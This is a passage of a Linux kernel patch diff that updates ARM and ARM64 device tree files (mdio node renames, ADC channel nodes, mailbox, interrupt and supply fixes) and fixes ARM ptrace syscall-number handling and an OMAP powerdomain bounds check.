+@@ -1527,6 +1531,8 @@ dtb-$(CONFIG_MACH_ARMADA_38X) += \
+ 	armada-388-helios4.dtb \
+ 	armada-388-rd.dtb
+ dtb-$(CONFIG_MACH_ARMADA_39X) += \
++	armada-390-db.dtb \
++	armada-395-gp.dtb \
+ 	armada-398-db.dtb
+ dtb-$(CONFIG_MACH_ARMADA_XP) += \
+ 	armada-xp-axpwifiap.dtb \
+@@ -1556,6 +1562,7 @@ dtb-$(CONFIG_MACH_DOVE) += \
+ dtb-$(CONFIG_ARCH_MEDIATEK) += \
+ 	mt2701-evb.dtb \
+ 	mt6580-evbp1.dtb \
++	mt6582-prestigio-pmt5008-3g.dtb \
+ 	mt6589-aquaris5.dtb \
+ 	mt6589-fairphone-fp1.dtb \
+ 	mt6592-evb.dtb \
+@@ -1608,6 +1615,7 @@ dtb-$(CONFIG_ARCH_ASPEED) += \
+ 	aspeed-bmc-intel-s2600wf.dtb \
+ 	aspeed-bmc-inspur-fp5280g2.dtb \
+ 	aspeed-bmc-inspur-nf5280m6.dtb \
++	aspeed-bmc-inspur-on5263m5.dtb \
+ 	aspeed-bmc-lenovo-hr630.dtb \
+ 	aspeed-bmc-lenovo-hr855xg2.dtb \
+ 	aspeed-bmc-microsoft-olympus.dtb \
+diff --git a/arch/arm/boot/dts/bcm47189-luxul-xap-1440.dts b/arch/arm/boot/dts/bcm47189-luxul-xap-1440.dts
+index e20b6d2eb274a..1e23e0a807819 100644
+--- a/arch/arm/boot/dts/bcm47189-luxul-xap-1440.dts
++++ b/arch/arm/boot/dts/bcm47189-luxul-xap-1440.dts
+@@ -46,3 +46,16 @@
+ 		};
+ 	};
+ };
++
++&gmac0 {
++	phy-mode = "rgmii";
++	phy-handle = <&bcm54210e>;
++
++	mdio {
++		/delete-node/ switch@1e;
++
++		bcm54210e: ethernet-phy@0 {
++			reg = <0>;
++		};
++	};
++};
+diff --git a/arch/arm/boot/dts/bcm47189-luxul-xap-810.dts b/arch/arm/boot/dts/bcm47189-luxul-xap-810.dts
+index 9d863570fcf3a..5dbb950c8113e 100644
+--- a/arch/arm/boot/dts/bcm47189-luxul-xap-810.dts
++++ b/arch/arm/boot/dts/bcm47189-luxul-xap-810.dts
+@@ -83,3 +83,16 @@
+ 		};
+ 	};
+ };
++
++&gmac0 {
++	phy-mode = "rgmii";
++	phy-handle = <&bcm54210e>;
++
++	mdio {
++		/delete-node/ switch@1e;
++
++		bcm54210e: ethernet-phy@0 {
++			reg = <0>;
++		};
++	};
++};
+diff --git a/arch/arm/boot/dts/bcm47189-tenda-ac9.dts b/arch/arm/boot/dts/bcm47189-tenda-ac9.dts
+index 55b92645b0f1f..b7c7bf0be76f4 100644
+--- a/arch/arm/boot/dts/bcm47189-tenda-ac9.dts
++++ b/arch/arm/boot/dts/bcm47189-tenda-ac9.dts
+@@ -135,8 +135,8 @@
+ 			label = "lan4";
+ 		};
+ 
+-		port@5 {
+-			reg = <5>;
++		port@8 {
++			reg = <8>;
+ 			label = "cpu";
+ 			ethernet = <&gmac0>;
+ 		};
+diff --git a/arch/arm/boot/dts/bcm53573.dtsi b/arch/arm/boot/dts/bcm53573.dtsi
+index 3f03a381db0f2..eed1a6147f0bf 100644
+--- a/arch/arm/boot/dts/bcm53573.dtsi
++++ b/arch/arm/boot/dts/bcm53573.dtsi
+@@ -127,6 +127,9 @@
+ 
+ 		pcie0: pcie@2000 {
+ 			reg = <0x00002000 0x1000>;
++
++			#address-cells = <3>;
++			#size-cells = <2>;
+ 		};
+ 
+ 		usb2: usb2@4000 {
+@@ -156,8 +159,6 @@
+ 			};
+ 
+ 			ohci: usb@d000 {
+-				#usb-cells = <0>;
+-
+ 				compatible = "generic-ohci";
+ 				reg = <0xd000 0x1000>;
+ 				interrupt-parent = <&gic>;
+diff --git a/arch/arm/boot/dts/bcm947189acdbmr.dts b/arch/arm/boot/dts/bcm947189acdbmr.dts
+index 16e70a264faf5..458bb6e2f5728 100644
+--- a/arch/arm/boot/dts/bcm947189acdbmr.dts
++++ b/arch/arm/boot/dts/bcm947189acdbmr.dts
+@@ -60,9 +60,9 @@
+ 	spi {
+ 		compatible = "spi-gpio";
+ 		num-chipselects = <1>;
+-		gpio-sck = <&chipcommon 21 0>;
+-		gpio-miso = <&chipcommon 22 0>;
+-		gpio-mosi = <&chipcommon 23 0>;
++		sck-gpios = <&chipcommon 21 0>;
++		miso-gpios = <&chipcommon 22 0>;
++		mosi-gpios = <&chipcommon 23 0>;
+ 		cs-gpios = <&chipcommon 24 0>;
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/imx7s.dtsi b/arch/arm/boot/dts/imx7s.dtsi
+index 11b9321badc51..667568aa4326a 100644
+--- a/arch/arm/boot/dts/imx7s.dtsi
++++ b/arch/arm/boot/dts/imx7s.dtsi
+@@ -1184,6 +1184,8 @@
+ 					<&clks IMX7D_USDHC1_ROOT_CLK>;
+ 				clock-names = "ipg", "ahb", "per";
+ 				bus-width = <4>;
++				fsl,tuning-step = <2>;
++				fsl,tuning-start-tap = <20>;
+ 				status = "disabled";
+ 			};
+ 
+@@ -1196,6 +1198,8 @@
+ 					<&clks IMX7D_USDHC2_ROOT_CLK>;
+ 				clock-names = "ipg", "ahb", "per";
+ 				bus-width = <4>;
++				fsl,tuning-step = <2>;
++				fsl,tuning-start-tap = <20>;
+ 				status = "disabled";
+ 			};
+ 
+@@ -1208,6 +1212,8 @@
+ 					<&clks IMX7D_USDHC3_ROOT_CLK>;
+ 				clock-names = "ipg", "ahb", "per";
+ 				bus-width = <4>;
++				fsl,tuning-step = <2>;
++				fsl,tuning-start-tap = <20>;
+ 				status = "disabled";
+ 			};
+ 
+diff --git a/arch/arm/boot/dts/qcom-ipq4019.dtsi b/arch/arm/boot/dts/qcom-ipq4019.dtsi
+index 02e13d8c222a0..b5e0ed4923b59 100644
+--- a/arch/arm/boot/dts/qcom-ipq4019.dtsi
++++ b/arch/arm/boot/dts/qcom-ipq4019.dtsi
+@@ -228,9 +228,12 @@
+ 			interrupts = <GIC_SPI 123 IRQ_TYPE_LEVEL_HIGH>, <GIC_SPI 138 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "hc_irq", "pwr_irq";
+ 			bus-width = <8>;
+-			clocks = <&gcc GCC_SDCC1_AHB_CLK>, <&gcc GCC_SDCC1_APPS_CLK>,
+-				 <&gcc GCC_DCD_XO_CLK>;
+-			clock-names = "iface", "core", "xo";
++			clocks = <&gcc GCC_SDCC1_AHB_CLK>,
++				 <&gcc GCC_SDCC1_APPS_CLK>,
++				 <&xo>;
++			clock-names = "iface",
++				      "core",
++				      "xo";
+ 			status = "disabled";
+ 		};
+ 
+diff --git a/arch/arm/boot/dts/s3c6410-mini6410.dts b/arch/arm/boot/dts/s3c6410-mini6410.dts
+index 17097da36f5ed..0b07b3c319604 100644
+--- a/arch/arm/boot/dts/s3c6410-mini6410.dts
++++ b/arch/arm/boot/dts/s3c6410-mini6410.dts
+@@ -51,7 +51,7 @@
+ 
+ 		ethernet@18000000 {
+ 			compatible = "davicom,dm9000";
+-			reg = <0x18000000 0x2 0x18000004 0x2>;
++			reg = <0x18000000 0x2>, <0x18000004 0x2>;
+ 			interrupt-parent = <&gpn>;
+ 			interrupts = <7 IRQ_TYPE_LEVEL_HIGH>;
+ 			davicom,no-eeprom;
+diff --git a/arch/arm/boot/dts/s5pv210-smdkv210.dts b/arch/arm/boot/dts/s5pv210-smdkv210.dts
+index fbae768d65e27..901e7197b1368 100644
+--- a/arch/arm/boot/dts/s5pv210-smdkv210.dts
++++ b/arch/arm/boot/dts/s5pv210-smdkv210.dts
+@@ -41,7 +41,7 @@
+ 
+ 	ethernet@a8000000 {
+ 		compatible = "davicom,dm9000";
+-		reg = <0xA8000000 0x2 0xA8000002 0x2>;
++		reg = <0xa8000000 0x2>, <0xa8000002 0x2>;
+ 		interrupt-parent = <&gph1>;
+ 		interrupts = <1 IRQ_TYPE_LEVEL_HIGH>;
+ 		local-mac-address = [00 00 de ad be ef];
+@@ -55,6 +55,14 @@
+ 		default-brightness-level = <6>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pwm3_out>;
++		power-supply = <&dc5v_reg>;
++	};
++
++	dc5v_reg: regulator-0 {
++		compatible = "regulator-fixed";
++		regulator-name = "DC5V";
++		regulator-min-microvolt = <5000000>;
++		regulator-max-microvolt = <5000000>;
+ 	};
+ };
+ 
+diff --git a/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi b/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi
+index d540550f7da26..fd89542c69c93 100644
+--- a/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi
++++ b/arch/arm/boot/dts/stm32mp157c-emstamp-argon.dtsi
+@@ -68,11 +68,6 @@
+ 			reg = <0x38000000 0x10000>;
+ 			no-map;
+ 		};
+-
+-		gpu_reserved: gpu@dc000000 {
+-			reg = <0xdc000000 0x4000000>;
+-			no-map;
+-		};
+ 	};
+ 
+ 	led: gpio_leds {
+@@ -102,9 +97,11 @@
+ 	adc1: adc@0 {
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&adc1_in6_pins_a>;
+-		st,min-sample-time-nsecs = <5000>;
+-		st,adc-channels = <6>;
+ 		status = "disabled";
++		channel@6 {
++			reg = <6>;
++			st,min-sample-time-ns = <5000>;
++		};
+ 	};
+ 
+ 	adc2: adc@100 {
+@@ -173,7 +170,7 @@
+ 	phy-handle = <&phy0>;
+ 	st,eth-ref-clk-sel;
+ 
+-	mdio0 {
++	mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "snps,dwmac-mdio";
+@@ -183,10 +180,6 @@
+ 	};
+ };
+ 
+-&gpu {
+-	contiguous-area = <&gpu_reserved>;
+-};
+-
+ &hash1 {
+ 	status = "okay";
+ };
+@@ -375,8 +368,8 @@
+ &m4_rproc {
+ 	memory-region = <&retram>, <&mcuram>, <&mcuram2>, <&vdev0vring0>,
+ 			<&vdev0vring1>, <&vdev0buffer>;
+-	mboxes = <&ipcc 0>, <&ipcc 1>, <&ipcc 2>;
+-	mbox-names = "vq0", "vq1", "shutdown";
++	mboxes = <&ipcc 0>, <&ipcc 1>, <&ipcc 2>, <&ipcc 3>;
++	mbox-names = "vq0", "vq1", "shutdown", "detach";
+ 	interrupt-parent = <&exti>;
+ 	interrupts = <68 1>;
+ 	interrupt-names = "wdg";
+diff --git a/arch/arm/boot/dts/stm32mp157c-ev1.dts b/arch/arm/boot/dts/stm32mp157c-ev1.dts
+index 050c3c27a4203..b72d5e8aa4669 100644
+--- a/arch/arm/boot/dts/stm32mp157c-ev1.dts
++++ b/arch/arm/boot/dts/stm32mp157c-ev1.dts
+@@ -144,7 +144,7 @@
+ 	max-speed = <1000>;
+ 	phy-handle = <&phy0>;
+ 
+-	mdio0 {
++	mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "snps,dwmac-mdio";
+diff --git a/arch/arm/boot/dts/stm32mp157c-lxa-mc1.dts b/arch/arm/boot/dts/stm32mp157c-lxa-mc1.dts
+index e8d2ec41d5374..cb00ce7cec8b1 100644
+--- a/arch/arm/boot/dts/stm32mp157c-lxa-mc1.dts
++++ b/arch/arm/boot/dts/stm32mp157c-lxa-mc1.dts
+@@ -112,7 +112,7 @@
+ 	phy-handle = <&ethphy>;
+ 	status = "okay";
+ 
+-	mdio0 {
++	mdio {
+ 		compatible = "snps,dwmac-mdio";
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/stm32mp157c-odyssey-som.dtsi b/arch/arm/boot/dts/stm32mp157c-odyssey-som.dtsi
+index 2d9461006810c..cf74852514906 100644
+--- a/arch/arm/boot/dts/stm32mp157c-odyssey-som.dtsi
++++ b/arch/arm/boot/dts/stm32mp157c-odyssey-som.dtsi
+@@ -62,11 +62,6 @@
+ 			reg = <0x38000000 0x10000>;
+ 			no-map;
+ 		};
+-
+-		gpu_reserved: gpu@d4000000 {
+-			reg = <0xd4000000 0x4000000>;
+-			no-map;
+-		};
+ 	};
+ 
+ 	led {
+@@ -80,11 +75,6 @@
+ 	};
+ };
+ 
+-&gpu {
+-	contiguous-area = <&gpu_reserved>;
+-	status = "okay";
+-};
+-
+ &i2c2 {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&i2c2_pins_a>;
+@@ -240,8 +230,8 @@
+ &m4_rproc {
+ 	memory-region = <&retram>, <&mcuram>, <&mcuram2>, <&vdev0vring0>,
+ 			<&vdev0vring1>, <&vdev0buffer>;
+-	mboxes = <&ipcc 0>, <&ipcc 1>, <&ipcc 2>;
+-	mbox-names = "vq0", "vq1", "shutdown";
++	mboxes = <&ipcc 0>, <&ipcc 1>, <&ipcc 2>, <&ipcc 3>;
++	mbox-names = "vq0", "vq1", "shutdown", "detach";
+ 	interrupt-parent = <&exti>;
+ 	interrupts = <68 1>;
+ 	status = "okay";
+diff --git a/arch/arm/boot/dts/stm32mp157c-odyssey.dts b/arch/arm/boot/dts/stm32mp157c-odyssey.dts
+index ed66d25b8bf3d..a8b3f7a547036 100644
+--- a/arch/arm/boot/dts/stm32mp157c-odyssey.dts
++++ b/arch/arm/boot/dts/stm32mp157c-odyssey.dts
+@@ -41,7 +41,7 @@
+ 	assigned-clock-rates = <125000000>; /* Clock PLL4 to 750Mhz in ATF/U-Boot */
+ 	st,eth-clk-sel;
+ 
+-	mdio0 {
++	mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "snps,dwmac-mdio";
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi
+index d3b85a8764d74..74a11ccc5333f 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi
+@@ -80,17 +80,19 @@
+ 	vdda-supply = <&vdda>;
+ 	vref-supply = <&vdda>;
+ 	status = "okay";
++};
+ 
+-	adc1: adc@0 {
+-		st,min-sample-time-nsecs = <5000>;
+-		st,adc-channels = <0>;
+-		status = "okay";
++&adc1 {
++	channel@0 {
++		reg = <0>;
++		st,min-sample-time-ns = <5000>;
+ 	};
++};
+ 
+-	adc2: adc@100 {
+-		st,adc-channels = <1>;
+-		st,min-sample-time-nsecs = <5000>;
+-		status = "okay";
++&adc2 {
++	channel@1 {
++		reg = <1>;
++		st,min-sample-time-ns = <5000>;
+ 	};
+ };
+ 
+@@ -125,7 +127,7 @@
+ 	max-speed = <100>;
+ 	phy-handle = <&phy0>;
+ 
+-	mdio0 {
++	mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "snps,dwmac-mdio";
+@@ -414,8 +416,8 @@
+ &m4_rproc {
+ 	memory-region = <&retram>, <&mcuram>, <&mcuram2>, <&vdev0vring0>,
+ 			<&vdev0vring1>, <&vdev0buffer>;
+-	mboxes = <&ipcc 0>, <&ipcc 1>, <&ipcc 2>;
+-	mbox-names = "vq0", "vq1", "shutdown";
++	mboxes = <&ipcc 0>, <&ipcc 1>, <&ipcc 2>, <&ipcc 3>;
++	mbox-names = "vq0", "vq1", "shutdown", "detach";
+ 	interrupt-parent = <&exti>;
+ 	interrupts = <68 1>;
+ 	status = "okay";
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
+index f068e4fcc404f..b7ba43865514d 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
+@@ -112,17 +112,39 @@
+ 	vdda-supply = <&vdda>;
+ 	vref-supply = <&vdda>;
+ 	status = "okay";
++};
+ 
+-	adc1: adc@0 {
+-		st,adc-channels = <0 1 6>;
+-		st,min-sample-time-nsecs = <5000>;
+-		status = "okay";
++&adc1 {
++	channel@0 {
++		reg = <0>;
++		st,min-sample-time-ns = <5000>;
+ 	};
+ 
+-	adc2: adc@100 {
+-		st,adc-channels = <0 1 2>;
+-		st,min-sample-time-nsecs = <5000>;
+-		status = "okay";
++	channel@1 {
++		reg = <1>;
++		st,min-sample-time-ns = <5000>;
++	};
++
++	channel@6 {
++		reg = <6>;
++		st,min-sample-time-ns = <5000>;
++	};
++};
++
++&adc2 {
++	channel@0 {
++		reg = <0>;
++		st,min-sample-time-ns = <5000>;
++	};
++
++	channel@1 {
++		reg = <1>;
++		st,min-sample-time-ns = <5000>;
++	};
++
++	channel@2 {
++		reg = <2>;
++		st,min-sample-time-ns = <5000>;
+ 	};
+ };
+ 
+@@ -151,7 +173,7 @@
+ 	max-speed = <1000>;
+ 	phy-handle = <&phy0>;
+ 
+-	mdio0 {
++	mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "snps,dwmac-mdio";
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi
+index bb4ac6c13cbd3..39af79dc654cc 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi
+@@ -78,7 +78,7 @@
+ 	max-speed = <1000>;
+ 	phy-handle = <&phy0>;
+ 
+-	mdio0 {
++	mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "snps,dwmac-mdio";
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi b/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi
+index fdc48536e97d1..73a6a7b278b90 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi
+@@ -141,7 +141,7 @@
+ 	max-speed = <1000>;
+ 	phy-handle = <&phy0>;
+ 
+-	mdio0 {
++	mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "snps,dwmac-mdio";
+diff --git a/arch/arm/include/asm/syscall.h b/arch/arm/include/asm/syscall.h
+index dfeed440254a8..fe4326d938c18 100644
+--- a/arch/arm/include/asm/syscall.h
++++ b/arch/arm/include/asm/syscall.h
+@@ -25,6 +25,9 @@ static inline int syscall_get_nr(struct task_struct *task,
+ 	if (IS_ENABLED(CONFIG_AEABI) && !IS_ENABLED(CONFIG_OABI_COMPAT))
+ 		return task_thread_info(task)->abi_syscall;
+ 
++	if (task_thread_info(task)->abi_syscall == -1)
++		return -1;
++
+ 	return task_thread_info(task)->abi_syscall & __NR_SYSCALL_MASK;
+ }
+ 
+diff --git a/arch/arm/kernel/entry-common.S b/arch/arm/kernel/entry-common.S
+index 405a607b754f4..b413b541c3c71 100644
+--- a/arch/arm/kernel/entry-common.S
++++ b/arch/arm/kernel/entry-common.S
+@@ -103,6 +103,7 @@ slow_work_pending:
+ 	cmp	r0, #0
+ 	beq	no_work_pending
+ 	movlt	scno, #(__NR_restart_syscall - __NR_SYSCALL_BASE)
++	str	scno, [tsk, #TI_ABI_SYSCALL]	@ make sure tracers see update
+ 	ldmia	sp, {r0 - r6}			@ have to reload r0 - r6
+ 	b	local_restart			@ ... and off we go
+ ENDPROC(ret_fast_syscall)
+diff --git a/arch/arm/kernel/ptrace.c b/arch/arm/kernel/ptrace.c
+index bfe88c6e60d58..cef106913ab7b 100644
+--- a/arch/arm/kernel/ptrace.c
++++ b/arch/arm/kernel/ptrace.c
+@@ -785,8 +785,9 @@ long arch_ptrace(struct task_struct *child, long request,
+ 			break;
+ 
+ 		case PTRACE_SET_SYSCALL:
+-			task_thread_info(child)->abi_syscall = data &
+-							__NR_SYSCALL_MASK;
++			if (data != -1)
++				data &= __NR_SYSCALL_MASK;
++			task_thread_info(child)->abi_syscall = data;
+ 			ret = 0;
+ 			break;
+ 
+diff --git a/arch/arm/mach-omap2/powerdomain.c b/arch/arm/mach-omap2/powerdomain.c
+index 2d747f6cffe8e..0eca44fc11926 100644
+--- a/arch/arm/mach-omap2/powerdomain.c
++++ b/arch/arm/mach-omap2/powerdomain.c
+@@ -174,7 +174,7 @@ static int _pwrdm_state_switch(struct powerdomain *pwrdm, int flag)
+ 		break;
+ 	case PWRDM_STATE_PREV:
+ 		prev = pwrdm_read_prev_pwrst(pwrdm);
+-		if (pwrdm->state != prev)
++		if (prev >= 0 && pwrdm->state != prev)
+ 			pwrdm->state_counter[prev]++;
+ 		if (prev == PWRDM_POWER_RET)
+ 			_update_logic_membank_counters(pwrdm);
+diff --git a/arch/arm64/boot/dts/nvidia/tegra210-smaug.dts b/arch/arm64/boot/dts/nvidia/tegra210-smaug.dts
+index 7c569695b7052..2b4dbfac84a70 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra210-smaug.dts
++++ b/arch/arm64/boot/dts/nvidia/tegra210-smaug.dts
+@@ -1312,6 +1312,7 @@
+ 
+ 	uartd: serial@70006300 {
+ 		compatible = "nvidia,tegra30-hsuart";
++		reset-names = "serial";
+ 		status = "okay";
+ 
+ 		bluetooth {
+diff --git a/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts b/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts
+index 57ab753288144..f094011be9ed9 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts
++++ b/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts
+@@ -2004,6 +2004,7 @@
+ 
+ 		serial@3100000 {
+ 			compatible = "nvidia,tegra194-hsuart";
++			reset-names = "serial";
+ 			status = "okay";
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+index e3e90ad92cc59..9650ae70c8723 100644
+--- a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
++++ b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+@@ -289,9 +289,9 @@
+ 		clock-names = "xclk";
+ 		clock-frequency = <23880000>;
+ 
+-		vdddo-supply = <&camera_vdddo_1v8>;
+-		vdda-supply = <&camera_vdda_2v8>;
+-		vddd-supply = <&camera_vddd_1v5>;
++		DOVDD-supply = <&camera_vdddo_1v8>;
++		AVDD-supply = <&camera_vdda_2v8>;
++		DVDD-supply = <&camera_vddd_1v5>;
+ 
+ 		/* No camera mezzanine by default */
+ 		status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/msm8916-longcheer-l8150.dts b/arch/arm64/boot/dts/qcom/msm8916-longcheer-l8150.dts
+index d85e7f7c0835a..75f7b4f35fe82 100644
+--- a/arch/arm64/boot/dts/qcom/msm8916-longcheer-l8150.dts
++++ b/arch/arm64/boot/dts/qcom/msm8916-longcheer-l8150.dts
+@@ -163,7 +163,7 @@
+ 		pinctrl-0 = <&light_int_default>;
+ 
+ 		vdd-supply = <&pm8916_l17>;
+-		vio-supply = <&pm8916_l6>;
++		vddio-supply = <&pm8916_l6>;
+ 	};
+ 
+ 	gyroscope@68 {
+diff --git a/arch/arm64/boot/dts/qcom/msm8996-xiaomi-gemini.dts b/arch/arm64/boot/dts/qcom/msm8996-xiaomi-gemini.dts
+index 4e5264f4116a0..3bbafb68ba5c5 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996-xiaomi-gemini.dts
++++ b/arch/arm64/boot/dts/qcom/msm8996-xiaomi-gemini.dts
+@@ -81,7 +81,7 @@
+ 		#size-cells = <0>;
+ 		interrupt-parent = <&tlmm>;
+ 		interrupts = <125 IRQ_TYPE_LEVEL_LOW>;
+-		vdda-supply = <&vreg_l6a_1p8>;
++		vio-supply = <&vreg_l6a_1p8>;
+ 		vdd-supply = <&vdd_3v2_tp>;
+ 		reset-gpios = <&tlmm 89 GPIO_ACTIVE_LOW>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index 9d6ec59d1cd3a..9de2248a385a5 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -1063,7 +1063,7 @@
+ 				reg-names = "dsi_ctrl";
+ 
+ 				interrupt-parent = <&mdss>;
+-				interrupts = <4>;
++				interrupts = <5>;
+ 
+ 				clocks = <&mmcc MDSS_MDP_CLK>,
+ 					 <&mmcc MDSS_BYTE1_CLK>,
+@@ -3292,6 +3292,9 @@
+ 			#size-cells = <1>;
+ 			ranges;
+ 
++			interrupts = <GIC_SPI 352 IRQ_TYPE_LEVEL_HIGH>;
++			interrupt-names = "hs_phy_irq";
++
+ 			clocks = <&gcc GCC_PERIPH_NOC_USB20_AHB_CLK>,
+ 				<&gcc GCC_USB20_MASTER_CLK>,
+ 				<&gcc GCC_USB20_MOCK_UTMI_CLK>,
+diff --git a/arch/arm64/boot/dts/qcom/msm8998.dtsi b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+index 29c60bb56ed5f..b00b8164c4aa2 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+@@ -2418,10 +2418,10 @@
+ 
+ 			clocks = <&mmcc MNOC_AHB_CLK>,
+ 				 <&mmcc BIMC_SMMU_AHB_CLK>,
+-				 <&rpmcc RPM_SMD_MMAXI_CLK>,
+ 				 <&mmcc BIMC_SMMU_AXI_CLK>;
+-			clock-names = "iface-mm", "iface-smmu",
+-				      "bus-mm", "bus-smmu";
++			clock-names = "iface-mm",
++				      "iface-smmu",
++				      "bus-smmu";
+ 
+ 			#global-interrupts = <0>;
+ 			interrupts =
+@@ -2445,6 +2445,8 @@
+ 				<GIC_SPI 261 IRQ_TYPE_LEVEL_HIGH>,
+ 				<GIC_SPI 262 IRQ_TYPE_LEVEL_HIGH>,
+ 				<GIC_SPI 272 IRQ_TYPE_LEVEL_HIGH>;
++
++			power-domains = <&mmcc BIMC_SMMU_GDSC>;
+ 		};
+ 
+ 		remoteproc_adsp: remoteproc@17300000 {
+diff --git a/arch/arm64/boot/dts/qcom/pm6150l.dtsi b/arch/arm64/boot/dts/qcom/pm6150l.dtsi
+index f02c223ef4485..06d729ff65a9d 100644
+--- a/arch/arm64/boot/dts/qcom/pm6150l.dtsi
++++ b/arch/arm64/boot/dts/qcom/pm6150l.dtsi
+@@ -75,8 +75,9 @@
+ 		pm6150l_wled: leds@d800 {
+ 			compatible = "qcom,pm6150l-wled";
+ 			reg = <0xd800>, <0xd900>;
+-			interrupts = <0x5 0xd8 0x1 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "ovp";
++			interrupts = <0x5 0xd8 0x1 IRQ_TYPE_EDGE_RISING>,
++				     <0x5 0xd8 0x2 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "ovp", "short";
+ 			label = "backlight";
+ 
+ 			status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/pm660l.dtsi b/arch/arm64/boot/dts/qcom/pm660l.dtsi
+index 8aa0a5078772b..88606b996d690 100644
+--- a/arch/arm64/boot/dts/qcom/pm660l.dtsi
++++ b/arch/arm64/boot/dts/qcom/pm660l.dtsi
+@@ -74,8 +74,9 @@
+ 		pm660l_wled: leds@d800 {
+ 			compatible = "qcom,pm660l-wled";
+ 			reg = <0xd800>, <0xd900>;
+-			interrupts = <0x3 0xd8 0x1 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "ovp";
++			interrupts = <0x3 0xd8 0x1 IRQ_TYPE_EDGE_RISING>,
++				     <0x3 0xd8 0x2 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "ovp", "short";
+ 			label = "backlight";
+ 
+ 			status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/pm8350.dtsi b/arch/arm64/boot/dts/qcom/pm8350.dtsi
+index 2dfeb99300d74..9ed9ba23e81e4 100644
+--- a/arch/arm64/boot/dts/qcom/pm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/pm8350.dtsi
+@@ -8,7 +8,7 @@
+ 
+ / {
+ 	thermal-zones {
+-		pm8350_thermal: pm8350c-thermal {
++		pm8350_thermal: pm8350-thermal {
+ 			polling-delay-passive = <100>;
+ 			polling-delay = <0>;
+ 			thermal-sensors = <&pm8350_temp_alarm>;
+diff --git a/arch/arm64/boot/dts/qcom/pm8350b.dtsi b/arch/arm64/boot/dts/qcom/pm8350b.dtsi
+index f1c7bd9d079c2..05c1058988927 100644
+--- a/arch/arm64/boot/dts/qcom/pm8350b.dtsi
++++ b/arch/arm64/boot/dts/qcom/pm8350b.dtsi
+@@ -8,7 +8,7 @@
+ 
+ / {
+ 	thermal-zones {
+-		pm8350b_thermal: pm8350c-thermal {
++		pm8350b_thermal: pm8350b-thermal {
+ 			polling-delay-passive = <100>;
+ 			polling-delay = <0>;
+ 			thermal-sensors = <&pm8350b_temp_alarm>;
+diff --git a/arch/arm64/boot/dts/qcom/pmi8994.dtsi b/arch/arm64/boot/dts/qcom/pmi8994.dtsi
+index 82b60e988d0f5..49902a3e161d9 100644
+--- a/arch/arm64/boot/dts/qcom/pmi8994.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmi8994.dtsi
+@@ -54,8 +54,9 @@
+ 		pmi8994_wled: wled@d800 {
+ 			compatible = "qcom,pmi8994-wled";
+ 			reg = <0xd800>, <0xd900>;
+-			interrupts = <3 0xd8 0x02 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "short";
